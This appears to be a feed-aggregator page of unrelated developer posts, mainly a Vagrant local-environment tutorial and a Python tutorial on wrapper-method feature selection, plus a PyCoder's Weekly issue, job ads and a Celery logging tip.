  • Support access via HTTP so you can write clients in any programming languages.
  • Support API gateway.
  • Support backup request, forking and broadcast.
rpcx uses a binary protocol and is platform-independent, which means you can develop services in other languages such as Java, Python, and Node.js, and you can use other programming languages to invoke services developed in Go.
There is a UI manager: rpcx-ui.

Performance

Test results show rpcx has better performance than other rpc frameworks except the standard rpc library.
Test Environment
  • CPU: Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz, 32 cores
  • Memory: 32G
  • Go: 1.9.0
  • OS: CentOS 7 / 3.10.0-229.el7.x86_64
from https://github.com/smallnest/rpcx

          Building a Local Development Environment with Vagrant on the Mac      Cache   Translate Page      

1. Introduction to Vagrant

1.1 What can Vagrant do?

Web development (Java/PHP/Python/Ruby…) requires a working local environment. Although most languages and tools now have Windows builds, or even one-click installers, compatibility with Windows (config files, compiled modules) is often poor, and the real deployment target is usually Linux, so development and production environments diverge and a lot of debugging happens right before launch. Having every developer build their own environment (install a hypervisor, download ISOs, pick a VM size, install an OS, configure it) wastes a great deal of time, and a team should keep everyone's runtime environment consistent. This is exactly what Vagrant is for. It is not intended for production deployment.
Vagrant is really a set of VM management tools, built on Ruby, that supports VirtualBox, VMware, and even AWS or Docker as the underlying virtualization system. With Vagrant we can package a Linux development environment and hand it to team members. Everyone can develop on their favorite desktop OS (Mac/Windows/Linux) while the code runs in the packaged environment, and "it works on my machine" becomes history.
If, after this introduction, you still wonder why you need Vagrant on top of VirtualBox or VMware, see the Q&A 使用vagrant的意义在哪 ("what is the point of using Vagrant"). Docker, as a rising star, can also do what Vagrant does; there is a great Stack Overflow exchange where the two projects' authors discuss their respective use cases (Chinese translation available).

1.2 A few concepts

  • Provider: the virtualization tool that Vagrant drives. Vagrant itself cannot create VMs; it calls virtualization tools such as VirtualBox, VMware, Xen, Docker, or even AWS. Once installed, they are wrapped underneath and driven by Vagrant through a unified set of commands. In other words, to use Vagrant you also need the corresponding provider installed; the default is the free, open-source VirtualBox.
  • Box: a VM image file that Vagrant can use directly, from 200 MB to 2 GB depending on its contents. Box formats differ between providers. Community-maintained boxes can be found on vagrantcloud.com.
  • Vagrantfile: Vagrant creates VMs according to the configuration in the Vagrantfile; it is the core of Vagrant. In it you specify which box to use (already downloaded, self-built, or an online URL), the VM's memory and CPU, which software to pre-install, the network configuration, and the shared folders with the host.
  • Provisioner: a kind of Vagrant plugin. Most ready-made boxes are not exactly what you want; with a provisioner you are familiar with, such as Puppet, software can be installed and configuration changed automatically when you run vagrant up. You could of course start the VM first, vagrant ssh in, and install software by hand, but not everyone is a system administrator; with a good Vagrantfile the VM is ready to use without any manual steps. Currently supported provisioners include the well-known automation tools Puppet, Salt, Ansible, and Chef (some experience required), as well as the shell provisioner, which, as the name implies, works by running shell commands.
  • Guest Additions: often mentioned in base box descriptions; generally used for host-to-VM port forwarding and shared folders. For development environments it is recommended to install them for testing.

2. Installing Vagrant

Pick the installer for your platform (Windows, Mac, Linux), e.g. vagrant_1.7.1.dmg and VirtualBox-4.3.20-96997-OSX.dmg on the Mac.

3. Building a local development environment with Vagrant

This article walks through the whole process of starting from the nrel CentOS 6.5 box, installing the necessary development packages, Python, plugins, and Puppet, then packaging the result into a box to distribute to the team. You can also further customize your environment on top of someone else's box through the Vagrantfile.

3.1 Initialization

3.1.1 vagrant box add {box-name} {box-url}

$ vagrant box add ct65_00 Downloads/centos65.box 
==> box: Adding box 'ct65_00' (v0) for provider:
box: Downloading: file:///Users/sean/Downloads/centos65.box
==> box: Successfully added box 'ct65_00' (v0) for 'virtualbox'!

$ ll ~/.vagrant.d/boxes/ct65_00
$ vagrant box list

# vagrant box list
ct65_00 (virtualbox, 0)
centos64-i386 (virtualbox, 0)
This command simply unpacks the given box (image) file into ~/.vagrant.d/boxes/{box-name}/0/virtualbox/, so you should try to perform all Vagrant operations as the same user.
F**K GFW
Behind the protection of the GFW, even this simple step of fetching a box file trips us up at the start. The official online install is very convenient outside the wall: vagrant box add minimal/centos6 downloads automatically from vagrantcloud.com (now renamed https://atlas.hashicorp.com/search/boxes) and goes straight to step two.
Another way is to run vagrant init minimal/centos6 first, then start directly with vagrant up --provider virtualbox. These have the same effect as downloading the box locally. To get the file URL, open the box version you need on vagrantcloud.com and append /providers/virtualbox.box, e.g. https://atlas.hashicorp.com/hashicorp/boxes/precise64 corresponds to the file https://atlas.hashicorp.com/hashicorp/boxes/precise64/providers/virtualbox.box.
Inside the wall, installing and starting a box online fails with:
The box 'ubuntu/trusty64' could not be found or
could not be accessed in the remote catalog. If this is a private
box on HashiCorp's Atlas, please verify you're logged in via
`vagrant login`. Also, please double-check the name. The expanded
URL and error message are shown below:

URL: ["https://atlas.hashicorp.com/ubuntu/trusty64"]
Error:
One workaround: get Ubuntu boxes from http://uec-images.ubuntu.com/vagrant/ and CentOS boxes from http://nrel.github.io/vagrant-boxes/. I have also downloaded a few typical boxes from outside the wall and shared them on my Baidu Cloud: http://pan.baidu.com/s/1sjHQBa1.
Update 2015-04-01: I just noticed the site is now reachable without a proxy. Happy April Fool's Day!

3.1.2 vagrant init {box-name}

$ mkdir ~/vagrant && cd ~/vagrant  //这个目录的目的就是统一管理你的Vagrantfile
$ vagrant init ct65_00
A `Vagrantfile` has been placed in this directory. You are now
ready to `vagrant up` your first virtual environment! Please read
the comments in the Vagrantfile as well as documentation on
`vagrantup.com` for more information on using Vagrant.

$ vi Vagrantfile
...
Vagrant.configure(2) do |config|
config.vm.box = "ct65_00"
onfig.vm.network "forwarded_port", guest: 80, host: 8080
# config.vm.synced_folder "../data", "/vagrant_data"
config.vm.provider "virtualbox" do |vb|
vb.memory = "384"
vb.cpus = 1
end
config.vm.hostname = "vg-ct65_00.tp-link.net"
...
init only generates a Vagrantfile and a .vagrant/ directory in the current directory. You can edit the file to define things such as the guest machine's hostname, memory, and CPU; more on the syntax later.
When you up the VM later, this box-name must match the one added above; if it is base it can be omitted.

3.2 Starting the VM

# vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Importing base box 'ct65_00'...
==> default: Matching MAC address for NAT networking...
==> default: Setting the name of the VM: v-box_default_1427284884787_97348
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
default: Adapter 1: nat
==> default: Forwarding ports...
default: 22 => 2222 (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
default: SSH address: 127.0.0.1:2222
default: SSH username: vagrant
default: SSH auth method: private key
default: Warning: Connection timeout. Retrying...
default: Warning: Connection timeout. Retrying...
...
default: Warning: Remote connection disconnect. Retrying...
default: Warning: Remote connection disconnect. Retrying...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
==> default: Mounting shared folders...
default: /vagrant => /root/vagrant/v-box/ct65_00
By default, up boots the VM according to the Vagrantfile in the current directory; if there is none, it searches the parent directory, and so on. The first vagrant up ct65_00 imports the corresponding box file from ~/.vagrant.d/boxes into ~/VirtualBox VMs/; you can see the VM's configuration with vboxmanage showvminfo {VM-ID} (VBoxManage on the Mac). If you want VMs stored in a specific place (space on my Mac SSD is precious), run VirtualBox and set the storage path manually.
By default localhost:2222 is forwarded to guest:22 for ssh connections; username/password: vagrant/vagrant; the default shared folder is the host directory containing the Vagrantfile. If a low-spec machine makes booting slow, or VirtualBox errors out, you may see the Connection timeout retries shown above.
One more note: once, while testing on a Linux host that was itself a vSphere VM, starting another VirtualBox VM through Vagrant (i.e. nested virtualization) kept Retrying forever. Following the Stack Overflow advice I opened the VBox GUI and found a CPU architecture problem blocking the boot, so I would advise against running a VM inside a VM:
VT-x/AMD-V hardware acceleration is not available on your system. Your 64-bit guest will fail to detect a 64-bit CPU and will not be able to boot.

3.3 Connecting to the VM and initializing the environment

vagrant ssh

$ vagrant ssh
Last login: Tue Mar 31 02:15:38 2015 from 10.0.2.2
Welcome to your Vagrant-built virtual machine.
The username/password agreed on when a box is built is usually vagrant/vagrant, and the root password is also vagrant; the default network mode is Host-Only.

Customize your environment

For example: install the JDK, create users, unpack Tomcat, edit server.xml, add yum repositories, and so on, all in one pass. The only thing worth pointing out is that in Tomcat's conf/server.xml,
<Context path="" docBase="/vagrant_data" reloadable="true" >... sets the application directory to the shared folder.

3.4 Packaging into a box

3.4.1 Install required software

Packaging is for distributing the box to others and extending it.
# yum install -y lrzsz telnet vim puppet puppetmaster
If you are building a box from scratch, you also need to create the vagrant user and install the public key; see 如何制作一个vagrant的base box ("how to make a Vagrant base box").

3.4.2 Install VirtualBox Guest Additions

Everyone's installed VirtualBox version is likely different, and vagrant up may warn that the versions are incompatible (the same major version is usually fine, in which case this step can be skipped). Incompatible Guest Additions break the host-to-guest shared-folder module and ultimately keep the VM from starting.
One option is vagrant-vbguest (note: a Vagrant plugin, not a VirtualBox one). Usage is well documented: just run vagrant plugin install vagrant-vbguest. By default it looks for a local VBoxGuestAdditions.iso (standard paths exist on each platform) and otherwise downloads it from http://download.virtualbox.org/virtualbox/%{version}/VBoxGuestAdditions_%{version}.iso; it installs or updates the Guest Additions when the VM boots, and vagrant vbguest can even target a running VM. The drawback is that plugin install needs network access. Below is the manual installation inside the VM:
Minimal boxes generally have no CDROM; add a DVD/CD storage device in the VirtualBox GUI, then after booting the VM use Devices -> Insert Guest Additions CD. (You can probably also find a way to attach the .iso file to the VM directly and skip the extra device.)
for Linux : /usr/share/virtualbox/VBoxGuestAdditions.iso
for Mac : /Applications/VirtualBox.app/Contents/MacOS/VBoxGuestAdditions.iso
for Windows : %PROGRAMFILES%/Oracle/VirtualBox/VBoxGuestAdditions.iso
$ sudo yum install -y kernel-devel-$(uname -r) gcc make dkms   # CentOS equivalents of linux-headers / build-essential
$ sudo mount /dev/cdrom /media/cdrom
$ sudo sh /media/cdrom/VBoxLinuxAdditions.run --nox11

3.4.3 vagrant package

Package and export:
 vagrant package --output sean-vg-ct65_ts.box
==> default: Attempting graceful shutdown of VM...
==> default: Clearing any previously set forwarded ports...
==> default: Exporting VM...
==> default: Compressing package to: /Users/sean/vagrant/sean-vg-ct65_ts.box
If a package.box with the same name already exists in the current directory, the export fails. The package source is not ~/.vagrant.d but the VirtualBox VM itself; use --base vm-name to specify which VM to export, and --vagrantfile file-pathname to embed a Vagrantfile directly into the box. You can now distribute this .box file to your developers.
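On a teammate's machine, consuming the packaged box follows the same add/init/up cycle from section 3.1; the local box name and project directory below are just examples:

```shell
# Import the distributed box under a local name...
vagrant box add ct65_team sean-vg-ct65_ts.box

# ...then create a project directory, generate a Vagrantfile, and boot it.
mkdir myproject && cd myproject
vagrant init ct65_team
vagrant up
vagrant ssh
```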

4. Miscellaneous

4.1 Commands

vagrant suspend puts the VM to sleep, saving its current state. A later vagrant up returns to where you left off. The advantage is that suspend and resume both take only a few seconds; the drawback is the extra disk space needed to store the state.
vagrant halt shuts the VM down. Start it again with vagrant up, which takes a bit longer.
vagrant destroy deletes the VM from disk. To recreate it, use vagrant up again.
vagrant reload restarts the VM, re-applying the Vagrantfile.
vagrant global-status shows the current state (powered off, running, etc.) of all VMs.
Vagrant 1.2+ also introduces a plugin mechanism: vagrant plugin can add all kinds of plugins, giving Vagrant far more flexibility for specific needs.
          Python Developer/Data Scientist - RiverPoint - Houston, TX      Cache   Translate Page      
We are looking for individuals to fill the role of Data Scientist on our model development team. This team builds the machine learning algorithms that...
From RiverPoint - Sat, 03 Nov 2018 06:30:32 GMT - View all Houston, TX jobs
          Portal Development and Wifi Engineer - RiverPoint - Philadelphia, PA      Cache   Translate Page      
Contract position - working remotely is not an option. • Experience of developing code in Php, Javascript or Python of at least 5 years • Experience of...
From RiverPoint - Tue, 30 Oct 2018 06:49:34 GMT - View all Philadelphia, PA jobs
          PyCoder’s Weekly: Issue #341 (Nov. 6, 2018)      Cache   Translate Page      
Come work on PyPI, the future of Python packaging, and more
PSF: Upcoming Contract Work on PyPI
#341 – NOVEMBER 6, 2018
PSF: Upcoming Contract Work on PyPI
If you have experience with security features or localization features in Python codebases, this is an opportunity to get involved with PyPI. You can register your interest to participate as a contractor online. The project begins in January 2019.
PYTHON SOFTWARE FOUNDATION

The Best Flake8 Extensions for Your Python Project
The flake8 code linter supports plugins that can check for additional rule violations. This post goes into the author’s favorite plugins. I didn’t know flake8-import-order was a thing and I will definitely try this out in my own projects.
JULIEN DANJOU

“Deal With It” Meme GIF Generator Using Python + OpenCV
How to create animated GIFs using OpenCV, Python, and ImageMagick. Super-detailed tutorial and the results are awesome.
ADRIAN ROSEBROCK

Find a Python Job Through Vettery
Vettery specializes in developer roles and is completely free for job seekers. Interested? Submit your profile, and if accepted onto the platform, you can receive interview requests directly from top companies seeking Python developers. Get Started.
VETTERYsponsor

Python 2.7 Halloween Facepaint
Scary!
REDDIT.COM

Writing Comments in Python (Guide)
How to write Python comments that are clean, concise, and useful. Get up to speed on what the best practices are, which types of comments it’s best to avoid, and how you can practice writing cleaner comments.
REAL PYTHON

pyproject.toml: The Future of Python Packaging
Deep dive with Brett Cannon into changes to Python packaging such as pyproject.toml, PEP 517, 518, and the implications of these changes. Lots of things happening in that area and this interview is a great way to stay up to date.
TESTANDCODE.COM podcast

Crash Reporting in Desktop Python Applications
The Dropbox desktop client is partly written in Python. This post goes into how their engineering teams do live crash-reporting in their desktop app. Also check out the related slide deck.
DROPBOX.COM


Discussions


When to Use @staticmethod vs Writing a Plain Function?
MAIL.PYTHON.ORG

Can a Non-Python-Programmer Set Up a Django Website With a Few Hours of Practice?
REDDIT.COM

Python Interview Question Post-Mortem
The question was how to merge two lists together in Python (without duplicates). Interviewers want to see a for-loop solution, even though it’s much slower than what the applicant came up with initially. Good read on what to do/what to avoid if you have a coding interview coming up.
REDDIT.COM

I Just Got a $67k Job Before I Even Graduated, All Thanks to Python
REDDIT.COM


Python Jobs


Senior Software Engineer - Full Stack (Raleigh, North Carolina)
SUGARCRM

Head of Engineering (Remote, Work from Anywhere)
FINDKEEP.LOVE

Senior Developer (Chicago, Illinois)
PANOPTA

Senior Software Engineer (Los Angeles, California)
GOODRX

More Python Jobs >>>


Articles & Tutorials


Setting Up Python for Machine Learning on Windows
In this step-by-step tutorial, you’ll cover the basics of setting up a Python numerical computation environment for machine learning on a Windows machine using the Anaconda Python distribution.
REAL PYTHON

Diving Into Pandas Is Faster Than Reinventing It
How modern Pandas makes your life easier by making your code easier to read—and easier to write.
DEAN LANGSAM • Shared by Dean Langsam

“Ultimate Programmer Super Stack” Bundle [90% off]
Become a well-rounded developer with this book & course bundle. Includes 25+ quality resources for less than $2 each. If you’re looking to round out your reading list for the cold months of the year, this is a great deal. Available this week only.
INFOSTACK.IO sponsor

Structure of a Flask Project
Suggestions for the folder structure of a Flask project. Nice and clean!
LEPTURE.COM • Shared by Python Bytes FM

Dockerizing Django With Postgres, Gunicorn, and Nginx
How to configure Django to run on Docker along with PostgreSQL, Nginx, and Gunicorn.
MICHAEL HERMAN

Making Python Project Executables With PEX
PEX files are distributable Python environments you can use to build executables for your project. These executables can then be copied to the target host and executed there without requiring an install step. This tutorial goes into how to build a PEX file for a simple Click CLI app.
PETER DEMIN

I Was Looking for a House, So I Built a Web Scraper in Python
MEDIUM.COM/@FNEVES • Shared by Ricky White

A Gentle Visual Intro to Data Analysis in Python Using Pandas
Short & sweet intro to basic Pandas concepts. Lots of images and visualizations in there make the article an easy read.
JAY ALAMMAR

Packaging and Developing Python Projects With Nested Git-Submodules
Working with repositories that have nested Git submodules of arbitrary depth, in the context of a Python project. Personally I’m having a hard time working effectively with Git submodules, but if they’re a good fit for your use case check out this article.
KONSTANTINOS DEMARTINOS

Python vs NumPy vs Nim Performance Comparison
Also check out the related discussion on Reddit.
NARIMIRAN.GITHUB.IO

Speeding Up JSON Schema Validation in Python
PETERBE.COM

Careful With Negative Assertions
A cautionary tale about testing that things are unequal…
NED BATCHELDER

Data Manipulation With Pandas: A Brief Tutorial
Covers three basic data manipulation techniques with Pandas: Modifying a DataFrame using the inplace parameter, grouping using groupby(), and handling missing data.
ERIK MARSJA

Full-Stack Developers, Unicorns and Other Mythological Beings
What’s a “Full-Stack” developer anyway?
MEDIUM.COM/DATADRIVENINVESTOR • Shared by Ricky White

Writing Custom Celery Task Loggers
The celery.task logger is used for logging task-specific information, which is useful if you need to know which task a log message came from.
BJOERN STIEL

Generating Software Tests Automatically
An online textbook on automating software testing, specifically by generating tests automatically. Covers random fuzzing, mutation-based fuzzing, grammar-based test generation, symbolic testing, and more. Examples use Python.
FUZZINGBOOK.ORG

Custom User Models in Django
How and why to add a custom user model to your Django project.
WSVINCENT.COM • Shared by Ricky White


Projects & Code


Vespene: Python CI/CD and Automation Server Written in Django
VESPENE.IO

zulu: A Drop-In Replacement for Native Python Datetimes That Embraces UTC
A drop-in replacement for native datetime objects that always uses UTC. Makes it easy to reason about zulu objects. Also conveniently parses ISO8601 and timestamps by default without any extra arguments.
DERRICK GILLAND • Shared by Derrick Gilland

My Python Examples (Scripts)
Little scripts and tools written by someone who says they’re “not a programmer.” Maybe the code quality isn’t perfect here—but hey, if you’re looking for problems to solve with Python, why not do something similar or contribute to this project by improving the scripts?
GITHUB.COM/GEEKCOMPUTERS

termtosvg: Record Terminal Sessions as SVG Animations
A Unix terminal recorder written in Python that renders your command line sessions as standalone SVG animations.
GITHUB.COM/NBEDOS

CPython Speed Center
A performance analysis tool for CPython. It shows performance regressions and allows comparing different applications or implementations over time.
SPEED.PYTHON.ORG

ase: Atomic Simulation Environment
A Python library for working with atoms. There’s a library on PyPI for everything…
GITLAB.COM/ASE

Various Pandas Solutions and Examples
PYTHONPROGRAMMING.IN • Shared by @percy_io

pymc-learn: Probabilistic Models for Machine Learning
Uses a familiar scikit-learn syntax.
PYMC-LEARN.ORG

ReviewNB: Jupyter Notebook Diff for GitHub
HTML-rendered diffs for Jupyter Notebooks. Say goodbye to messy JSON diffs and collaborate on notebooks via review comments.
REVIEWNB.COM


Events


Python LX
14 Nov. in Lisbon, Portugal
PYTHON.ORG

PyData Bristol Meetup (Nov 13)
PYTHON.ORG

Python Miami
10 Nov. – 11 Nov. in Miami, FL.
PYTHON.ORG

Happy Pythoning!
Copyright © 2018 PyCoder’s Weekly, All rights reserved.



Stack Abuse: Applying Wrapper Methods in Python for Feature Selection

Introduction

In the previous article, we studied how we can use filter methods for feature selection for machine learning algorithms. Filter methods are handy when you want to select a generic set of features for all the machine learning models.

However, in some scenarios, you may want to use a specific machine learning algorithm to train your model. In such cases, features selected through filter methods may not be the most optimal set of features for that specific algorithm. There is another category of feature selection methods that select the most optimal features for the specified algorithm. Such methods are called wrapper methods.

Wrapper Methods for Feature Selection

Wrapper methods are based on greedy search algorithms as they evaluate all possible combinations of the features and select the combination that produces the best result for a specific machine learning algorithm. A downside to this approach is that testing all possible combinations of the features can be computationally very expensive, particularly if the feature set is very large.

As mentioned earlier, wrapper methods can find the best set of features for a specific algorithm; the downside is that this set of features may not be optimal for other machine learning algorithms.

Wrapper methods for feature selection can be divided into three categories: Step forward feature selection, Step backwards feature selection and Exhaustive feature selection. In this article, we will see how we can implement these feature selection approaches in Python.

Step Forward Feature Selection

In the first phase of the step forward feature selection, the performance of the classifier is evaluated with respect to each feature. The feature that performs the best is selected out of all the features.

In the second step, the first feature is tried in combination with all the other features. The combination of two features that yields the best algorithm performance is selected. The process continues until the specified number of features is selected.
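The greedy loop described above can be sketched without any ML framework. This is a minimal illustration, not the article's actual method; `toy_score` is a hypothetical stand-in for cross-validated classifier performance:

```python
def forward_select(features, score, k):
    """Greedy step-forward selection: grow the selected set one
    feature at a time, keeping whichever addition scores best."""
    selected = []
    while len(selected) < k:
        best = max(
            (f for f in features if f not in selected),
            key=lambda f: score(selected + [f]),
        )
        selected.append(best)
    return selected

# Toy score (assumption): reward subsets containing "informative" features.
informative = {"v4", "v10", "v14"}
toy_score = lambda subset: len(informative & set(subset))

print(forward_select(["v1", "v4", "v7", "v10", "v14"], toy_score, 3))
# → ['v4', 'v10', 'v14']
```

With a real estimator, `score` would train and cross-validate the model on each candidate subset; that model-fitting loop is the expensive part that a library selector automates.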

Let's implement step forward feature selection in Python. We will be using the BNP Paribas Cardif Claims Management dataset for this section as we did in our previous article.

To implement step forward feature selection, we need to convert categorical feature values into numeric feature values. However, for the sake of simplicity, we will remove all the non-categorical columns from our data. We will also remove the correlated columns as we did in the previous article so that we have a small feature set to process.

Data Preprocessing

The following script imports the dataset and the required libraries, it then removes the non-numeric columns from the dataset and then divides the dataset into training and testing sets. Finally, all the columns with a correlation of greater than 0.8 are removed. Take a look at this article for the detailed explanation of this script:

import pandas as pd  
import numpy as np  
from sklearn.model_selection import train_test_split  
from sklearn.feature_selection import VarianceThreshold

paribas_data = pd.read_csv(r"E:\Datasets\paribas_data.csv", nrows=20000)  
paribas_data.shape

num_colums = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']  
numerical_columns = list(paribas_data.select_dtypes(include=num_colums).columns)  
paribas_data = paribas_data[numerical_columns]  
paribas_data.shape

train_features, test_features, train_labels, test_labels = train_test_split(  
    paribas_data.drop(labels=['target', 'ID'], axis=1),
    paribas_data['target'],
    test_size=0.2,
    random_state=41)

correlated_features = set()  
correlation_matrix = paribas_data.corr()  
for i in range(len(correlation_matrix .columns)):  
    for j in range(i):
        if abs(correlation_matrix.iloc[i, j]) > 0.8:
            colname = correlation_matrix.columns[i]
            correlated_features.add(colname)


train_features.drop(labels=correlated_features, axis=1, inplace=True)  
test_features.drop(labels=correlated_features, axis=1, inplace=True)

train_features.shape, test_features.shape  
Implementing Step Forward Feature Selection in Python

To select the most optimal features, we will be using the SequentialFeatureSelector function from the mlxtend library. The library can be installed by executing the following command at the Anaconda command prompt:

conda install -c conda-forge mlxtend  

We will use the Random Forest Classifier to find the most optimal features. The evaluation criterion used will be ROC-AUC. The following script selects the 15 features from our dataset that yield the best performance for the random forest classifier:

from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score

from mlxtend.feature_selection import SequentialFeatureSelector

feature_selector = SequentialFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           k_features=15,
           forward=True,
           verbose=2,
           scoring='roc_auc',
           cv=4)

In the script above we pass the RandomForestClassifier as the estimator to the SequentialFeatureSelector function. The k_features specifies the number of features to select. You can set any number of features here. The forward parameter, if set to True, performs step forward feature selection. The verbose parameter is used for logging the progress of the feature selector, the scoring parameter defines the performance evaluation criteria and finally, cv refers to cross-validation folds.

Having created our feature selector, we now need to call its fit method and pass it the training features and labels, as shown below:

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

Depending upon your system hardware, the above script can take some time to execute. Once the above script finishes executing, you can execute the following script to see the 15 selected features:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

In the output, you should see the following features:

Index(['v4', 'v10', 'v14', 'v15', 'v18', 'v20', 'v23', 'v34', 'v38', 'v42',  
       'v50', 'v51', 'v69', 'v72', 'v129'],
      dtype='object')

Now to see the classification performance of the random forest algorithm using these 15 features, execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

In the script above, we train our random forest algorithm on the 15 features that we selected using the step forward feature selection and then we evaluated the performance of our algorithm on the training and testing sets. In the output, you should see the following results:

Accuracy on training set: 0.7072327148174093  
Accuracy on test set: 0.7096973252804142  

You can see that the accuracy on training and test sets is pretty similar which means that our model is not overfitting.

Step Backwards Feature Selection

Step backwards feature selection, as the name suggests, is the exact opposite of the step forward feature selection that we studied in the last section. In the first step of step backwards feature selection, one feature is removed in round-robin fashion from the feature set and the performance of the classifier is evaluated.

The feature set that yields the best performance is retained. In the second step, again one feature is removed in a round-robin fashion and the performance of each resulting feature subset (now missing two features) is evaluated. This process continues until the specified number of features remains in the dataset.
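The same greedy idea runs in reverse. Again a minimal sketch, with a hypothetical toy scoring function in place of real model evaluation:

```python
def backward_select(features, score, k):
    """Step-backward selection: drop one feature per round, keeping
    the best-scoring remaining subset, until k features remain."""
    selected = list(features)
    while len(selected) > k:
        # Try removing each feature in turn; keep the best remainder.
        selected = max(
            ([f for f in selected if f != drop] for drop in selected),
            key=score,
        )
    return selected

# Toy score (assumption): penalise subsets containing "noisy" features.
noisy = {"v1", "v7"}
toy_score = lambda subset: -len(noisy & set(subset))

print(backward_select(["v1", "v4", "v7", "v10"], toy_score, 2))
# → ['v4', 'v10']
```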

Step Backwards Feature Selection in Python

In this section, we will implement step backwards feature selection on the BNP Paribas Cardif Claims Management dataset. The preprocessing step will remain the same as in the previous section. The only change will be in the forward parameter of the SequentialFeatureSelector class. In the case of step backwards feature selection, we set this parameter to False. Execute the following script:

from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score  
from mlxtend.feature_selection import SequentialFeatureSelector

feature_selector = SequentialFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           k_features=15,
           forward=False,
           verbose=2,
           scoring='roc_auc',
           cv=4)

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

To see the features selected as a result of step backwards elimination, execute the following script:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

The output looks like this:

Index(['v7', 'v8', 'v10', 'v17', 'v34', 'v38', 'v45', 'v50', 'v51', 'v61',  
       'v94', 'v99', 'v119', 'v120', 'v129'],
      dtype='object')

Finally, let's evaluate the performance of our random forest classifier on the features selected as a result of step backwards feature selection. Execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

The output looks like this:

Accuracy on training set: 0.7095207938140247  
Accuracy on test set: 0.7114624676445211  

You can see that the performance achieved on the training set is similar to that achieved using step forward feature selection. However, on the test set, backward feature selection performed slightly better.

Exhaustive Feature Selection

In exhaustive feature selection, the performance of a machine learning algorithm is evaluated against all possible combinations of the features in the dataset. The feature subset that yields the best performance is selected. The exhaustive search algorithm is the most computationally demanding of all the wrapper methods since it tries every combination of features and selects the best.

A downside to exhaustive feature selection is that it can be much slower than the step forward and step backward methods since it evaluates all feature combinations.
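The cost gap between the approaches is easy to quantify with math.comb. The numbers below assume 20 candidate features, purely for illustration:

```python
from math import comb

n_features = 20  # illustrative feature count (assumption)

# Exhaustive search over all subsets of 2 to 4 features:
exhaustive = sum(comb(n_features, k) for k in range(2, 5))

# Step-forward selection of 15 features fits at most one model
# per remaining candidate per round:
forward = sum(n_features - k for k in range(15))

print(exhaustive, forward)  # → 6175 195
```

Even with these small bounds, the exhaustive search needs over thirty times as many model fits, and the gap explodes as the feature count grows.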

Exhaustive Feature Selection in Python

In this section, we will implement exhaustive feature selection on the BNP Paribas Cardif Claims Management dataset. The preprocessing step will remain similar to that of step forward feature selection.

To implement exhaustive feature selection, we will be using the ExhaustiveFeatureSelector class from the mlxtend.feature_selection library. The class has min_features and max_features parameters which can be used to specify the minimum and the maximum number of features in the combinations.

Execute the following script:

from mlxtend.feature_selection import ExhaustiveFeatureSelector  
from sklearn.ensemble import RandomForestRegressor, RandomForestClassifier  
from sklearn.metrics import roc_auc_score

feature_selector = ExhaustiveFeatureSelector(RandomForestClassifier(n_jobs=-1),  
           min_features=2,
           max_features=4,
           scoring='roc_auc',
           print_progress=True,
           cv=2)

Having created our feature selector, we now need to call its fit method and pass it the training features and labels, as shown below:

features = feature_selector.fit(np.array(train_features.fillna(0)), train_labels)  

Note that the above script can take quite a bit of time to execute. To see the features selected as a result of exhaustive feature selection, execute the following script:

filtered_features= train_features.columns[list(features.k_feature_idx_)]  
filtered_features  

Finally, to see the performance of the random forest classifier on the features selected as a result of exhaustive feature selection, execute the following script:

clf = RandomForestClassifier(n_estimators=100, random_state=41, max_depth=3)  
clf.fit(train_features[filtered_features].fillna(0), train_labels)

train_pred = clf.predict_proba(train_features[filtered_features].fillna(0))  
print('Accuracy on training set: {}'.format(roc_auc_score(train_labels, train_pred[:,1])))

test_pred = clf.predict_proba(test_features[filtered_features].fillna(0))  
print('Accuracy on test set: {}'.format(roc_auc_score(test_labels, test_pred [:,1])))  

Conclusion

Wrapper methods are some of the most important algorithms used for feature selection for a specific machine learning algorithm. In this article, we studied different types of wrapper methods along with their practical implementation. We studied step forward, step backwards and exhaustive methods for feature selection.

As a rule of thumb, if the dataset is small, the exhaustive feature selection method should be the method of choice; however, for large datasets, the step forward or step backward feature selection methods should be preferred.


Python Celery - Weekly Celery Tutorials and How-tos: Quick Guide: Custom Celery Task Logger

I previously wrote about how to customise your Celery log handlers. But there is another Celery logger, the celery.task logger. The celery.task logger is a special logger set up by the Celery worker. Its goal is to add task-related information to the log messages. It exposes two new parameters:

  • task_id
  • task_name

This is useful because it helps you understand which task a log message comes from. The task logger is available via celery.utils.log.

# tasks.py
import os
from celery.utils.log import get_task_logger
from worker import app


logger = get_task_logger(__name__)


@app.task()
def add(x, y):
    result = x + y
    logger.info(f'Add: {x} + {y} = {result}')
    return result

Executing the add task with get_task_logger produces the following log output.

[2018-11-06 07:30:13,545: INFO/MainProcess] Received task: tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb]
[2018-11-06 07:30:13,546: INFO/MainProcess] tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb]: Add: 3 + 5 = 8
